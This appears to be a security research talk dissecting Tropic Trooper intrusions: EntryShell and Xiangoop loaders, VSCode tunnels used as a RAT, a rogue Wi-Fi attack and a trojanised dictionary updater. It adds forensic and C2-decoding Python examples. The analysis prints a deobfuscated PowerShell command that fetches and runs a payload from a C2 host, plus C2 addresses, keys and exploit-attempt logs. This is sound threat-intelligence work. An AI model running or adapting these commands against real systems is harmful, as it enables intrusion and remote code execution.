# Pirates of The Nang Hai: Follow the Artifacts No One Knows

ITOCHU Cyber & Intelligence Inc.

-----

## Who are we?

- Yusuke Niwa, Lead Cybersecurity Researcher (VB2023, Botconf, JSAC etc.)
- Suguru Ishimaru, Sr. Cybersecurity Researcher (HITCON 2021, 2019, 2017 and 2016)

Company: ITOCHU Cyber & Intelligence Inc.

-----

## Special Thanks to team members

Motohiko Sato, Shuhei Sasada, Yasuhiro Takeda (X: @58_158_177_102, @sugimu_sec, @ytakeda_sec)

Company: ITOCHU Cyber & Intelligence Inc.

-----

### Agenda

- Motivation
- Who is Tropic Trooper?
  - EntryShell
  - Xiangoop Loader
- Disclosing Uncommon Attack Methods
  - VSCode As a RAT
  - EvilTwin Attack
  - Exploiting Domestic Electronic Seal System (NEW)
  - Update process of a well-known app (NEW)
- Conclusions

-----

### Motivation

Reminiscent of a Spy Movie: we observed three uncommon attack methods utilized by Tropic Trooper, and they occurred in the wild.

Challenges in Identification: these sophisticated intrusion and compromise techniques are extremely difficult to identify. They require expert skills and a significant amount of time.

Need for Flexibility in Investigation: it is crucial to avoid fixed notions based on traditional attack methods. We will present an approach to investigation built on flexibility and insight.

-----

### Who is Tropic Trooper?

Tropic Trooper (a.k.a. Pirate Panda, KeyBoy and APT23) first drew the world's attention under the name KeyBoy in 2013. This group shows great enthusiasm for the Asia-Pacific region and has long been targeting government and military units.

Activity is attributed to Tropic Trooper based on specific target areas:

◼ Taiwan
◼ Vietnam
◼ India
◼ Australia
◼ Philippines
◼ Thailand

and on specific malware families:

◼ KeyBoy
◼ EntryShell
◼ CobaltStrike Beacon + Watermark 520
◼ Xiangoop

References:
https://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf
https://citizenlab.ca/2016/11/parliament-keyboy/
https://www.macnica.co.jp/business/security/security-reports/pdf/cyberespionage_report_2022.pdf

-----

### EntryShell

EntryShell is a variant of KeyBoy. It is a fileless RAT with commands such as Sysinfo, Download, Shell and so on. The DLL has only one malicious export function, 'DllEntry'. We named it from the export and one of its commands: (Dll)Entry + Shell -> EntryShell.

EntryShell updates:

◼ String obfuscation
◼ Malware configuration
◼ Backdoor commands
◼ C2 communications
◼ Junk code

-----

Several distinctive strings are hardcoded within EntryShell. These strings are the same as in KeyBoy, and the code and features are almost the same.

-----

The encrypted strings are decrypted with AES-128 ECB. Decrypted strings: login_OK, Update, UpdateAndRun, Refresh, OnLine, Disconnect, Pw_Error, Pw_OK, Ctrl_End, Sysinfo, Download, UploadFileOk, Ascii2bin, RemoteRun, Computer + Shell, ChangeCfg.

-----

The malware configuration is hard-coded internally and designed to be decrypted and utilized upon infection.
Decompiled excerpt of the configuration decoding routine:

```c
v_enc_mod = (v_enc & (1 << (7 - n_count))) != 0;
result = v_enc_mod + 2 * v_enc_next;
v_enc_next = v_enc_mod + 2 * v_enc_next;
```

Decoded configuration:

| Field | Value |
|---|---|
| Check Code | 0123456789 |
| C2 address #1 | 85[.]209[.]43[.]142 |
| C2 address #2 | 0 |
| Port Number #1 | 4431 |
| Port Number #2 | 0 |
| Port Number #3 | 0 |
| PIN for C2 Operation | 1003 |
| Proxy | 0 |
| Proxy Port | 0 |
| Proxy User | 0 |
| Proxy Password | 0 |

-----

### Xiangoop Loader

Another unique malware, Xiangoop, was observed as a loader/downloader for payloads such as EntryShell and CobaltStrike Beacon. We also discovered an artifact with a PDB path left in by the attacker's mistake. Two words taken from folder names in the developer's environment were combined to generate the malware name: xiang(mu) + goop(date.dll) -> Xiangoop.

-----

(Figure: timeline of Xiangoop variants A, AJ, AM, AwD, AwDC, AwDJ, AwMJ, SxI and SxJC, dated from Nov 03 2022 to Mar 26 2024. Variant A (Nov 03 03:12:29 2022) is a PE x32 DLL named goopdate.dll exporting DllEntry; variant AJ (Mar 06 08:49:58 2023) and most later variants are PE x64 DLLs named McVsoCfg.dll exporting McVsoCfgGetObject and reading the BLOB setting.dat; variant SxJC (Jun 15 07:14:39 2023) is a PE x64 EXE named AdobeFlash.exe; several variants fetch a next stage from /qwja…no.php.)

Collected 200+ samples between 2022 and 2024.

-----

Xiangoop A is a simple loader that runs its payload in memory and is started via DLL side-loading. The payload is decrypted with AES in ECB mode using the hardcoded key "123456AAAAAAAAAA".

Flow: googleupdate.exe (legitimate EXE) side-loads goopdate.dll (Xiangoop), which reads base.jpg and decrypts EntryShell.

-----

Xiangoop AJ is almost the same as variant A: a simple loader using AES ECB mode with the hardcoded key "123456AAAAAAAAAA". The difference is the HUGE amount of junk code.

Flow: Avira.exe (legitimate EXE) side-loads McVsoCfg.dll (Xiangoop), which reads a BLOB and decrypts the Cobalt Strike Beacon.

-----

The variant dropped by AdobeFlash.exe uses a different crypto scheme:

◼ Salsa20 to decrypt the payload from the BLOB
◼ x25519 + hsalsa20 + hsalsa20 to generate the crypto key
◼ Poly1305 to calculate a check value for the success of key generation
◼ Huge junk code + control flow flattening

Flow: the AdobeFlash.exe dropper reads the BLOB and decrypts the payload.

-----

### Disclosing Uncommon Attack Methods

(Diagram: initial infection vectors, namely spear-phishing by email or SMS, physical penetration with a rogue Wi-Fi AP and stolen credentials, exploitation of a domestic electronic seal system, and the update process of a well-known app, lead to post-exploitation with the Xiangoop loader delivering Cobalt Strike Beacon or EntryShell, plus an unrecognized RAT: VSCode.)

1. VSCode As a RAT
2. EvilTwin Attack
3. Exploiting Domestic Electronic Seal System
4. Update of a well-known app

-----

### Case1 VSCode as a RAT: Attack Overview

VSCode has a remote tunneling feature. By using it, the victim host is remotely controlled by the attacker. This is pretty difficult to filter out at the firewall, because the tunnel source is Microsoft.

(Diagram: the attacker operates through the Tropic Trooper C2 server; a downloader side-loads a BLOB and installs the RAT, the VSCode CLI, on the victim host; the VSCode CLI opens a legitimate tunnel to Microsoft's server (VSCode Server), through which the attacker's operation reaches the host.)
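The investigation of this case, shown in the following slides, merges MFT, USN Journal, ShimCache and Event Log records into one super timeline and then links the VSCode artifacts to the PowerShell activity. The script below is an added example, not the authors' tooling: it merges constructed records modelled on the Case 1 timeline (the username `victim`, the CSV/space/pipe export layouts and the indicator regexes are assumptions) and flags the tunnel-to-terminal chain.

```python
"""Build a super timeline from several artifact exports and flag VSCode tunnel
indicators (added example; constructed data modelled on the Case 1 timeline)."""
from dataclasses import dataclass
from datetime import datetime, timedelta
import re

# Constructed records, not the real case data. The username "victim" is invented;
# the Stable-<commit> directory name is the one that appears in the slide deck.
MFT_CSV = r"""
2023/9/25 13:41:40,C:\Intel\Profiles\code.exe
2023/9/25 13:44:19,C:\Users\victim\.vscode\cli\tunnel-stable.lock
2023/9/25 13:56:37,C:\Users\victim\.vscode-server\data\logs\20230925T134907\ptyhost.log
2023/9/25 13:56:55,C:\Users\victim\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
"""
SHIMCACHE = r"""
2023/9/25 13:41:59 c:\Intel\Profiles\runtime.exe
2023/9/25 13:48:55 C:\Users\victim\.vscode\cli\servers\.staging\server\node.exe
"""
EVENTLOG = r"""
2023/9/25 13:56:39|C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -noexit -command try { . "c:\Users\victim\.vscode\cli\servers\Stable-abd2f3db4bdb28f9e95536dfa84d8479f1eb312d\server\out\vs\workbench\contrib\terminal\browser\media\shellIntegration.ps1" } catch {}
"""
TS_FMT = "%Y/%m/%d %H:%M:%S"


@dataclass(frozen=True)
class Event:
    ts: datetime
    source: str   # artifact the record came from
    action: str
    path: str     # file path, or the full command line for process events


def parse_mft(text):
    """MFT export: '<timestamp>,<full path>' per line (layout is an assumption)."""
    for line in text.strip().splitlines():
        ts, path = line.split(",", 1)
        yield Event(datetime.strptime(ts, TS_FMT), "MFT", "File Creation", path)


def parse_shimcache(text):
    """ShimCache export: '<date> <time> <path>' per line (layout is an assumption)."""
    for line in text.strip().splitlines():
        day, clock, path = line.split(" ", 2)
        yield Event(datetime.strptime(f"{day} {clock}", TS_FMT), "Shimcache",
                    "Suspect File Execution", path)


def parse_eventlog(text):
    """Process-creation events: '<timestamp>|<command line>' per line (assumption)."""
    for line in text.strip().splitlines():
        ts, cmd = line.split("|", 1)
        yield Event(datetime.strptime(ts, TS_FMT), "Windows Event Log",
                    "Powershell Execution", cmd)


def build_super_timeline(*streams):
    """Merge every artifact stream into one list ordered by timestamp."""
    return sorted((e for s in streams for e in s), key=lambda e: e.ts)


# Indicators derived from the artifacts in the Case 1 timeline; the regexes are ours.
INDICATORS = {
    "code_exe_outside_program_files": re.compile(r"^(?!c:\\program files).*\\code\.exe$", re.I),
    "tunnel_lock": re.compile(r"\\\.vscode\\cli\\tunnel-\w+\.lock$", re.I),
    "vscode_server_binary": re.compile(r"\\\.vscode\\cli\\servers\\.*\\node\.exe$", re.I),
    "ptyhost_log": re.compile(r"\\\.vscode-server\\data\\logs\\.*\\ptyhost\.log$", re.I),
    "vscode_terminal_powershell": re.compile(
        r"powershell\.exe.*\\\.vscode\\cli\\servers\\.*shellIntegration\.ps1", re.I),
}


def flag(timeline):
    """Return (event, indicator name) for every record that matches an indicator."""
    return [(e, name) for e in timeline for name, rx in INDICATORS.items() if rx.search(e.path)]


def link_tunnel_to_shell(timeline, window=timedelta(minutes=30)):
    """Pair each tunnel lock (②) with VSCode-terminal PowerShell launches (③) that
    follow it within `window`: the link the PowerShell logs are used to verify."""
    locks = [e for e in timeline if INDICATORS["tunnel_lock"].search(e.path)]
    shells = [e for e in timeline if INDICATORS["vscode_terminal_powershell"].search(e.path)]
    return [(lock, sh) for lock in locks for sh in shells if timedelta(0) <= sh.ts - lock.ts <= window]


def investigate():
    tl = build_super_timeline(parse_mft(MFT_CSV), parse_shimcache(SHIMCACHE), parse_eventlog(EVENTLOG))
    return tl, flag(tl), link_tunnel_to_shell(tl)


if __name__ == "__main__":
    tl, hits, links = investigate()
    for e in tl:
        print(f"{e.ts:%Y/%m/%d %H:%M:%S}  {e.source:<17} {e.action:<22} {e.path[:70]}")
    for e, name in hits:
        print(f"INDICATOR {name:<30} {e.ts:%H:%M:%S}")
    for lock, sh in links:
        print(f"tunnel lock {lock.ts:%H:%M:%S} -> VSCode terminal PowerShell {sh.ts:%H:%M:%S} ({sh.ts - lock.ts} later)")
```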
-----

### Case1 About the super timeline

It is important to create a super timeline by linking together the recorded events from various artifacts.

Example artifacts:

◼ MFT Record
◼ USN Journal
◼ Windows Event Log
◼ ShimCache
◼ Prefetch
◼ SRUM
◼ FireWall Logs
◼ Registry
etc.

-----

#### Case1 Create a super timeline for compromised host

| Time (UTC+8) | Action | Path | Filename | Artifact |
|---|---|---|---|---|
| 2023/9/23 10:33:32 | File Creation | C:¥Users¥¥Desktop | 中秋节礼盒清单.iso | MFT |
| 2023/9/23 10:33:47 | File Creation | C:¥Users¥¥AppData¥Roaming¥Microsoft¥Windows¥Recent | 海神星礼盒A款.png.lnk | MFT |
| 2023/9/24 19:45:18 | File Creation | C:¥Users¥¥AppData¥Roaming¥Microsoft¥Windows¥Recent | 中秋节礼盒清单.iso.lnk | MFT |
| 2023/9/24 19:45:22 | File Execution | E:/ | 卡券和礼盒清单.exe | Registry |
| 2023/9/24 19:56:34 | File Creation | C:¥Users¥Public¥Music | msoev.exe | MFT |
| 2023/9/24 20:00:35 | File Creation | C:¥Users¥Public¥Music | mosev.exe | MFT |
| 2023/9/25 13:26:32 | File Creation | C:¥Users¥Public¥Music | McVsoCfg.dll | MFT |
| 2023/9/25 13:29:11 | File Creation | C:¥Users¥Public¥Music | a.ini | MFT |
| 2023/9/25 13:31:35 | Directory Creation | D Drive | winows10 | UsnJrnl |
| 2023/9/25 13:33:27 | File Creation | D Drive | McVsoCfg.dll | UsnJrnl |
| 2023/9/25 13:33:47 | File Creation | D Drive | Desktop.ini | UsnJrnl |
| 2023/9/25 13:34:09 | File Creation | D Drive | mosev.exe | UsnJrnl |
| 2023/9/25 13:41:40 | File Creation | C:¥Intel¥Profiles | code.exe | MFT |
| 2023/9/25 13:41:59 | File Creation | C:¥Intel¥Profiles | runtime.exe | MFT |
| 2023/9/25 13:41:59 | Suspect File Execution | c:¥Intel¥Profiles | runtime.exe | Shimcache |
| 2023/9/25 13:44:19 | Directory Creation | C:¥Users¥ | VSCODE~1 | MFT |
| 2023/9/25 13:44:19 | File Creation | c:¥Users¥¥.vscode¥cli | tunnel-stable.lock | MFT |
| 2023/9/25 13:48:57 | Suspect File Execution | c:¥Users¥¥.vscode¥cli¥servers¥Stable-¥server¥node_modules¥@vscode¥ripgrep¥bin | rg.exe | Shimcache |
| 2023/9/25 13:48:55 | Suspect File Execution | C:¥Users¥¥.vscode¥cli¥servers¥.staging¥server | node.exe | Shimcache |
| 2023/9/25 13:48:55 | Suspect File Execution | C:¥Users¥¥.vscode¥cli¥servers¥¥server | node.exe | Shimcache |
| 2023/9/25 13:49:01 | Suspect File Execution | C:¥Users¥¥.vscode¥cli¥servers¥¥server¥node_modules¥node-vsce-sign¥bin | vsce-sign.exe | Shimcache |
| 2023/9/25 13:49:05 | File Creation | c:¥Users¥¥.vscode¥cli¥servers¥¥server¥out¥vs¥workbench¥contrib¥terminal¥browser¥media | shellIntegration.ps1 | MFT |
| 2023/9/25 13:55:35 | Directory Creation | C:¥Users¥¥AppData¥Local¥Temp | .tmp7DIT16 | MFT |
| 2023/9/25 13:55:35 | File Creation | C:¥Users¥¥AppData¥Local¥Temp¥.tmp7DIT16 | vscode_cli_win32_x64_cli.zip | MFT |
| 2023/9/25 13:55:36 | Directory Creation | C:¥Users¥¥AppData¥Local¥Temp¥.tmp7DIT16 | content | MFT |
| 2023/9/25 13:55:36 | File Creation | C:¥Users¥¥AppData¥Local¥Temp¥.tmp7DIT16¥content | code.exe | MFT |
| 2023/9/25 13:56:37 | File Creation | C:¥Users¥¥.vscode-server¥data¥logs¥20230925T134907 | ptyhost.log | MFT |
| 2023/9/25 13:56:39 | Directory Creation | C:¥Users¥¥AppData¥Local¥Microsoft¥Windows | PowerShell | MFT |
| 2023/9/25 13:56:53 | File Creation | C:¥Users¥¥AppData¥Local¥Microsoft¥Windows¥PowerShell | ModuleAnalysisCache | MFT |
| 2023/9/25 13:56:55 | Directory Creation | C:¥Users¥¥AppData¥Roaming¥Microsoft¥Windows | PowerShell | MFT |
| 2023/9/25 13:56:55 | Directory Creation | C:¥Users¥¥AppData¥Roaming¥Microsoft¥Windows¥PowerShell | PSReadLine | MFT |
| 2023/9/25 13:56:55 | File Creation | C:¥Users¥¥AppData¥Roaming¥Microsoft¥Windows¥PowerShell¥PSReadLine | ConsoleHost_history.txt | MFT |

Callouts on the slide: ① File Download and Execution (at the 2023/9/25 13:33:27 McVsoCfg.dll row), ② What is VSCode!? (at the 13:41:59 runtime.exe row), ③ PowerShell (at the 13:56:39 PowerShell row). Explore the links between ② and ③.

-----

#### Case1 Explore the PowerShell logs to verify the links

Major artifacts of PowerShell execution:

| Artifact | Location |
|---|---|
| Windows PowerShell commands history log | %USERPROFILE%¥AppData¥Roaming¥Microsoft¥Windows¥PowerShell¥PSReadLine¥ConsoleHost_history.txt |
| Windows Event Log | Windows PowerShell.evtx, Microsoft-Windows-Powershell%4Operational.evtx |

The PowerShell execution was likely triggered by VSCode!

-----

### Case1 Deep-dive VSCode activity

VSCode itself (② What is VSCode!?):

| Time (UTC+8) | Action | Path | Filename | Artifact |
|---|---|---|---|---|
| 2023/9/25 13:41:40 | File Creation | C:¥Intel¥Profiles | code.exe | MFT |
| 2023/9/25 13:41:59 | File Creation | C:¥Intel¥Profiles | runtime.exe | MFT |
| 2023/9/25 13:41:59 | Suspect File Execution | c:¥Intel¥Profiles | runtime.exe | Shimcache |
| 2023/9/25 13:44:18 | File Creation | C:¥Intel¥Profiles | tmp | MFT |
| 2023/9/25 13:44:19 | Directory Creation | C:¥Users¥ | VSCODE~1 | MFT |
| 2023/9/25 13:44:19 | File Creation | c:¥Users¥¥.vscode¥cli | tunnel-stable.lock | MFT |
| 2023/9/25 13:48:57 | Suspect File Execution | c:¥Users¥¥.vscode¥cli¥servers¥Stable-¥server¥node_modules¥@vscode¥ripgrep¥bin | rg.exe | Shimcache |
| 2023/9/25 13:48:55 | Suspect File Execution | C:¥Users¥¥.vscode¥cli¥servers¥.staging¥server | node.exe | Shimcache |
| 2023/9/25 13:48:55 | Suspect File Execution | C:¥Users¥¥.vscode¥cli¥servers¥¥server | node.exe | Shimcache |
| 2023/9/25 13:49:01 | Suspect File Execution | C:¥Users¥¥.vscode¥cli¥servers¥¥server¥node_modules¥node-vsce-sign¥bin | vsce-sign.exe | Shimcache |
| 2023/9/25 13:49:05 | File Creation | c:¥Users¥¥.vscode¥cli¥servers¥¥server¥out¥vs¥workbench¥contrib¥terminal¥browser¥media | shellIntegration.ps1 | MFT |
| 2023/9/25 13:55:35 | Directory Creation | C:¥Users¥¥AppData¥Local¥Temp | .tmp7DIT16 | MFT |
| 2023/9/25 13:55:35 | File Creation | C:¥Users¥¥AppData¥Local¥Temp¥.tmp7DIT16 | vscode_cli_win32_x64_cli.zip | MFT |
| 2023/9/25 13:55:36 | Directory Creation | C:¥Users¥¥AppData¥Local¥Temp¥.tmp7DIT16 | content | MFT |
| 2023/9/25 13:55:36 | File Creation | C:¥Users¥¥AppData¥Local¥Temp¥.tmp7DIT16¥content | code.exe | MFT |
| 2023/9/25 13:56:37 | File Creation | C:¥Users¥¥.vscode-server¥data¥logs¥20230925T134907 | ptyhost.log | MFT |
| 2023/9/25 13:56:39 | Powershell Execution | C:¥WINDOWS¥System32¥WindowsPowerShell¥v1.0¥powershell.exe -noexit -command try { . "c:¥Users¥¥.vscode¥cli¥servers¥Stable-abd2f3db4bdb28f9e95536dfa84d8479f1eb312d¥server¥out¥vs¥workbench¥contrib¥terminal¥browser¥media¥shellIntegration.ps1" } catch {} | - | Windows Event Log |

Callouts on the slide: "Tunnel was established" at the 13:44:18 tmp row; "Launching Terminal" at the 13:56:39 Powershell Execution row.

Finally, this timeline proves that after the malware infection, the attacker used the VSCode terminal to run PowerShell.

-----

### Case1 Catch the attacker's commands

◼ We found an artifact which reveals the commands used, helping us understand the actor's operation.
◼ Interestingly, the actor got Wi-Fi access point information via the VSCode tunnel.

-----

### Case2 EvilTwin Attack Overview

◼ The attacker physically intruded and secretly set up a Wi-Fi access point with an SSID spoofing the target organization's name.
◼ They could get credentials when a targeted employee connected to the Wi-Fi and input a password.
◼ The attacker came physically again to set up their PC and access the target Wi-Fi using the stolen credential.
◼ Interestingly, CobaltStrike was installed on the PC.

1. Look for the site
2. Set up a rogue Wi-Fi (rogue SSID)
3. Victim connects to the rogue Wi-Fi
4. Steal the credential
5. Set up a PC under the legitimate Wi-Fi (attacker's PC with CobaltStrike)

-----

### Case2 How to find this attack method

◼ An admin login failure alert on the AD server revealed a suspicious IP within the branch's wireless LAN range using a non-standard host name.
◼ In Case 1, the attacker also attempted to steal the Wi-Fi password, indicating an intention for continuous physical intrusions.
◼ Just before the unauthorized access, a suspicious SSID appeared in the target office building.

-----

##### Why target the Wi-Fi?
◼ Physical intrusions carry a high risk for the attacker.
◼ Once the attacker connects to a Wi-Fi AP, they can access the intranet directly.

The attacker crosses the boundary between physical and cyber spaces to achieve their goals!

-----

Have you seen something like this before? (A web app of a domestic electronic seal system.)

-----

### Case3 Scanning Domestic Electronic Seal System

◼ Following the intrusion in Case 2, Case 3 occurred. The attacker's PC connected via the office's Wi-Fi.
◼ The attacker controlled the PC via CobaltStrike and vulnerability-scanned the domestic electronic seal web server.

(Diagram: Attacker -> attacker's PC with CobaltStrike installed, on the office Wi-Fi -> vulnerability scanning -> web server in the intranet, the domestic electronic seal system.)

-----

IDS alerts observed during the scan:

| Time | Source address | Destination address | URL/Filename | Threat/Content Name |
|---|---|---|---|---|
| 2023/7/27 15:43 | Attacker’s PC | 103.234.54[.]128 | 103.234.54[.]128/ | CobaltStrike.Gen Command and Control Traffic(12067) |
| 2023/7/27 15:54 | Attacker’s PC | Web System | server_ping.php | Anmei Digital Hotel Broadband OS Remote Command Injection Vulnerability(92963) |
| 2023/7/27 15:55 | Attacker’s PC | Web System | validate.jsp | HTTP SQL Injection Attempt(58005) |
| 2023/7/27 15:55 | Attacker’s PC | Web System | WorkflowServiceXml | Weaver E-cology OA System Remote Code Execution Vulnerability(93415) |
| 2023/7/27 15:55 | Attacker’s PC | Web System | user.php | ECShop SQL Injection Vulnerability(93140) |
| 2023/7/27 15:55 | Attacker’s PC | Web System | delete_cart_goods.php | HTTP SQL Injection Attempt(54608) |
| 2023/7/27 15:55 | Attacker’s PC | Web System | plugin | HTTP Directory Traversal Request Attempt(30844) |
| 2023/7/27 15:55 | Attacker’s PC | Web System | passwd | HTTP /etc/passwd Access Attempt(35107) |
| 2023/7/27 15:55 | Attacker’s PC | Web System | login | Inspur ClusterEngine Command Injection Vulnerability(90789) |
| 2023/7/27 15:55 | Attacker’s PC | Web System | showOrDownByurl.do | HT T P Directory Traversal Request Attempt(30844) |
| 2023/7/27 15:55 | Attacker’s PC | Web System | createTokenByPassword | Jenkins Exposure of Sensitive Information Vulnerability(55171) |
| 2023/7/27 15:55 | Attacker’s PC | Web System | ViewUserHover.jspa | Atlassian Jira Server and Data Center ViewUserHover.jspa Information Disclosure Vulnerability(93347) |
| 2023/7/27 15:55 | Attacker’s PC | Web System | index.php | HTTP SQL Injection Attempt(54608) |
| 2023/7/27 15:55 | Attacker’s PC | Web System | downfile.php | Microsoft Windows win.ini Access Attempt Detected(30851) |
| 2023/7/27 15:55 | Attacker’s PC | Web System | config.properties | Ffay Lanproxy Directory Traversal Vulnerability(90235) |
| 2023/7/27 15:56 | Attacker’s PC | Web System | jkstatus; | Apache Web Server Access Control Bypass Vulnerability(54785) |
| 2023/7/27 15:56 | Attacker’s PC | Web System | index.php | Apache Tomcat Remote Code Execution Via JSP Upload Vulnerability(38761) |
| 2023/7/27 15:56 | Attacker’s PC | Web System | 1) and (select 1 from (select count(*),concat(0x716b627671,(sel | HTTP SQL Injection Attempt(93331) |
| 2023/7/27 15:56 | Attacker’s PC | Web System | fileList | ThinkPHP Arbitrary File Write Vulnerability(57622) |
| 2023/7/27 16:35 | Attacker’s PC | Web System | verify | VMware Server-Side Template Injection Remote Code Execution Vulnerability(92483) |
| 2023/7/27 16:35 | Attacker’s PC | Web System | hedwig.cgi | D-Link Remote Code Execution Vulnerability(57934) |
| 2023/7/27 16:35 | Attacker’s PC | Web System | win.ini | Microsoft Windows win.ini Access Attempt Detected(30851) |
| 2023/7/27 16:35 | Attacker’s PC | Web System | Web System/node/?_format=hal_json | Drupal core Remote Code Execution Vulnerability(55385) |
| 2023/7/27 16:35 | Attacker’s PC | Web System | WorkflowServiceXml | Weaver E-cology OA System Remote Code Execution Vulnerability(93415) |
| 2023/7/27 16:35 | Attacker’s PC | Web System | getdata.jsp | Weaver OA8 SQL Injection Vulnerability(91183) |
| 2023/7/27 16:35 | Attacker’s PC | Web System | SyncUserInfo.jsp | HTTP SQL Injection Attempt(35823) |
| 2023/7/27 16:35 | Attacker’s PC | Web System | WorkflowCenterTreeData.jsp | Drupal Core Remote Code Execution Vulnerability(40627) |

Why did the attacker target the system?

◼ To get any info from the unique system
◼ Just scanning for a web server in the intranet

-----

### Case4 CobaltStrike Beacon was detected

◼ In early May 2024, we got some alerts regarding process injection with CobaltStrike Beacon.
◼ With the sudden appearance of the malware, the initial vector is unknown.

(Diagram: infected host, 5/2 11:53:00 - 5/6 19:07:00. CobaltStrike Beacon alerts by date, C2 address and process: 2024/5/2, 154.90.62[.]210, WeChatAppEx.exe; 2024/5/4, 154.90.62[.]210, McAfeeManager.exe; 2024/5/4, 154.90.62[.]210, AdobeARM.exe; 2024/5/6, 45.32.117[.]177, AdobeARM.exe.)

-----

### Case4 Find suspicious points

Dive into the timeline of the past month or so. As a result, two suspicious events were identified based on common characteristics: creating suspicious files under the Public folder and using files with the .cab extension, both of which were also used in past attack campaigns.

-----

### Case4 Any suspicious points?

Several seconds before the alert, suspicious files are found:

◼ script.js
◼ YoudaoDictUpt.exe

-----

### Case4 Datetime, Size, Hash are useful

Aren't these files unusually small in size for some reason?

MD5: 16a37c7c2f8b7310ee8ef2dcd33af39b. The hash values of both files are the same. *Nothing in VirusTotal.com.

-----

YoudaoDictUpt.exe is a downloader disguised as a YoudaoDict updater. It retrieves a .js file, script.js (1.js), from the C2 server and executes the JS via Wscript.

-----

◼ script.js is obfuscated.
◼ The de-obfuscated script shows that it downloads an archive "test.cab" from a C2 and saves it to a specific file path.
◼ Then, the script extracts the cab file and executes McAfeeManager.exe to load the next stage, Downloader3.

De-obfuscated script result (partial excerpt):

```
powershell.exe" -ExecutionPolicy Bypass -Command "$url = 'hxxp://39.101.207[.]15/test.cab'; $outputPath = 'C:¥Users¥Public¥Music¥2.cab'; $extractPath = 'C:¥Users¥Public¥Music¥'; Invoke-WebRequest -Uri $url -OutFile $outputPath; Expand -F:* $outputPath $extractPath; Start-Process -FilePath 'C:¥Users¥Public¥Music¥McAfeeManager.exe'"
```

Chain: script.js (1.js), the downloader, fetches the archive 2.cab (test.cab); the archive contains McAfeeManager.exe (legitimate EXE), which side-loads McVsoCfg.dll (Downloader3).

-----

### Case4 Identified the Initial Infection Vector

◼ The updater file was the source of infection.
◼ The script.js and cab files are also malicious.

(Diagram: Youdao infrastructure and target host. 2024/3/25, 45.32.117[.]177: YoudaoDict.exe, YoudaoDictUpt.exe (Downloader1), script.js (1.js) (Downloader2), 1.cab (Malware Set). 2024/4/13, 39.101.207[.]15: YoudaoDictUpt.exe (Downloader1), script.js (1.js) (Downloader2), 2.cab (Malware Set). Paths: C:¥Users¥¥ and C:¥Users¥Public¥Music¥.)

-----

This DLL file is Downloader3, and its code was obfuscated by CFF (control flow flattening). It downloads shellcode from the hardcoded C2 and launches it in memory. It is a Xiangoop variant.

(Diagram: 2.cab (test.cab) archive -> McAfeeManager.exe (legitimate EXE) side-loads McVsoCfg.dll (Downloader3, Xiangoop) -> launch the downloaded shellcode.)

-----

The shellcode contains another PE which is also a downloader. The PE sends the victim's environment, such as language ID, hostname and username, to the C2 so that non-targets can be filtered out. Then it delivers the next encrypted payload if the host is one of their targets. The decryption is AES using the Windows API with a hardcoded key.
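The payload at the end of this chain is the Cobalt Strike Beacon whose configuration is extracted on the next slide. Its Malleable_C2_Instructions describe how the implant recovers task data from an HTTP response: remove 910 bytes from the end, remove 1182 bytes from the beginning, NetBIOS-decode with base 'a', then remove the XOR mask. The decoder below is an added example, not the authors' tool; the NetBIOS (two base-offset characters per byte) and mask (4-byte random key prefix, XOR applied cyclically) encodings follow the Malleable C2 transform definitions, and the sample body is constructed.

```python
"""Strip the Malleable C2 transport transform from a Beacon HTTP response body
(added example using the instructions in the extracted configuration)."""
from dataclasses import dataclass
import os


@dataclass(frozen=True)
class TransformSteps:
    """Client-side decode steps in execution order, as listed in the config."""
    append_len: int    # "Remove N bytes from the end"
    prepend_len: int   # "Remove N bytes from the beginning"
    netbios_base: str  # "NetBIOS decode 'a'" (lower-case alphabet; 'A' for netbiosu)
    xor_mask: bool     # "XOR mask w/ random key"


# Values taken from the Malleable_C2_Instructions of the Beacon on this page.
BEACON_STEPS = TransformSteps(append_len=910, prepend_len=1182, netbios_base="a", xor_mask=True)


def netbios_decode(data: bytes, base: str = "a") -> bytes:
    """Each plaintext byte is sent as two characters: base+high nibble, base+low nibble."""
    if len(data) % 2:
        raise ValueError("NetBIOS-encoded data must have even length")
    b = ord(base)
    out = bytearray()
    for hi, lo in zip(data[0::2], data[1::2]):
        if not (0 <= hi - b < 16 and 0 <= lo - b < 16):
            raise ValueError("character outside the NetBIOS alphabet")
        out.append(((hi - b) << 4) | (lo - b))
    return bytes(out)


def xor_unmask(data: bytes) -> bytes:
    """mask: a 4-byte random key is prepended and XORed cyclically over the data."""
    if len(data) < 4:
        raise ValueError("masked data needs a 4-byte key prefix")
    key, body = data[:4], data[4:]
    return bytes(c ^ key[i % 4] for i, c in enumerate(body))


def decode_response(body: bytes, steps: TransformSteps) -> bytes:
    """Apply the decode steps in order; the result is Beacon's encrypted task stream."""
    if len(body) < steps.prepend_len + steps.append_len:
        raise ValueError("response shorter than the fixed prepend/append padding")
    data = body[: len(body) - steps.append_len]   # "Remove N bytes from the end"
    data = data[steps.prepend_len:]               # "Remove N bytes from the beginning"
    data = netbios_decode(data, steps.netbios_base)
    return xor_unmask(data) if steps.xor_mask else data


def netbios_encode(data: bytes, base: str = "a") -> bytes:
    b = ord(base)
    return bytes(x for c in data for x in (b + (c >> 4), b + (c & 0x0F)))


def encode_response(payload: bytes, steps: TransformSteps, key: bytes = b"") -> bytes:
    """Inverse (server-side) transform, used here only to build a constructed sample body."""
    data = payload
    if steps.xor_mask:
        key = key or os.urandom(4)
        data = key + bytes(c ^ key[i % 4] for i, c in enumerate(payload))
    data = netbios_encode(data, steps.netbios_base)
    # The real profile's prepend/append strings are not on the page; filler bytes stand in.
    return b"<" * steps.prepend_len + data + b">" * steps.append_len


# Constructed sample: not real Beacon traffic, just bytes to round-trip.
SAMPLE_TASK = b"constructed task bytes for the round-trip demo"
SAMPLE_KEY = bytes.fromhex("0badf00d")


def demo() -> bytes:
    body = encode_response(SAMPLE_TASK, BEACON_STEPS, SAMPLE_KEY)
    return decode_response(body, BEACON_STEPS)


if __name__ == "__main__":
    print(demo())
```

What comes out is still the task stream encrypted under the Beacon session key, so stripping the transform is the first step of traffic analysis, not the last.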
-----

Extracted malware configuration of the CobaltStrike Beacon:

```
BeaconType - HTTPS
Port - 50000
SleepTime - 3000
MaxGetSize - 2099252
Jitter - 45
MaxDNS - Not Found
PublicKey_MD5 - 5d31cda8059a60086c394d0e51f7a178
C2Server - 154.90.62[.]210,/Originate/contacts/CX4YJ5JI7RZ
